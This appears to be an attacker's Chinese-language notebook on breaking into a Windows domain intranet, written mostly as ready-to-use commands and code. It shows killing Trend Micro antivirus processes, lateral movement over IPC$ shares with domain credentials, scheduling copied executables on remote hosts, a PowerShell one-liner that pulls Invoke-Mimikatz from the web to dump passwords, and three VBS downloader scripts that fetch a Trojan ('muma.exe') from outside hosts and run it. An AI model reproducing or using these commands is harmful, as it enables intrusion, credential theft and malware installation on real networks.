某内网纪实
渗透总结:
环境为172段,拿到shell,补丁全打,站库分离,360分分钟教我做人,上了个大马,net一套命令下来,有域,恰好库在域这个段,此时我想通过mssql执行cmdshell种马(其实通过mssql已经拿到几台服务器了。但是感觉用shell去访问不行)
vbs下载者,bitsadmin下载,ipc链接copy过去,
1.bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\p.zip win03下没有,拷贝win7过去不能使用。
2.vbs下载者 我echo执行所有命令,发现执行超时。趋势科技防火墙,我用system权限,taskkill /f /t /im pid结束进程,结果关闭掉了mssql进程(手误)
大概有四个进程:
NTRtScan.exe 1964 ntrtscan
PccNTMon.exe 3924 暂缺
CNTAoSMgr.exe 296 暂缺
PccNTMon.exe 5452 暂缺
ipc net use \\10.1.111.1\c$ "dc\username" /user:"password"
copy path\xx.exe \\10.xxxx\c$\xx.exe
net time \\ip
at time \\ip\C$\x.exe (典型的手法)
接下来的思路:
查看shell进行提权,溢出,mssql,ftp,收集更多的信息,比如mail等
确定控下的这两天内网机器是否存在web,如果是这样就很轻松了。
msf+cobalt strike+veil提权看看
powershell 抓密码:
powershell
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > C:\programdata\pass.txt"
执行命令:psexec
https://technet.microsoft.com/en-us/sysinternals/bb897553
https://github.com/nick-o/impacket
vbs下载三种版本:
一、VBS下载者: Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://www.03389.com/muma.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile "c:\zl.exe",2 wscript.sleep 1000 Shell.Run ("c:\zl.exe") '延迟过后执行下载文件 二、cmd下执行的版本: echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs echo Set Shell = CreateObject("Wscript.Shell") >>zl.vbs echo Post.Open "GET","http://www.03389.com/muma.exe",0 >>zl.vbs echo Post.Send() >>zl.vbs echo Set aGet = CreateObject("ADODB.Stream") >>zl.vbs echo aGet.Mode = 3 >>zl.vbs echo aGet.Type = 1 >>zl.vbs echo aGet.Open() >>zl.vbs echo aGet.Write(Post.responseBody) >>zl.vbs echo aGet.SaveToFile "c:\zl.exe",2 >>zl.vbs echo wscript.sleep 1000 >>zl.vbs echo Shell.Run ("c:\zl.exe") >>zl.vbs 三、wget.vbs on error resume next iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) iUser=LCase(Wscript.Arguments(2)) iPass=LCase(Wscript.Arguments(3)) set xPost=CreateObject("Microsoft.XMLHTTP") if iUser="" and iPass="" then xPost.Open "GET",iRemote,0 else xPost.Open "GET",iRemote,0,iUser,iPass end if xPost.Send() set sGet=CreateObject("ADODB.Stream") sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write xPost.ResponseBody sGet.SaveToFile iLocal,2 使用方法:cscript wget.vbs http://www.moonsec.com/muma.exe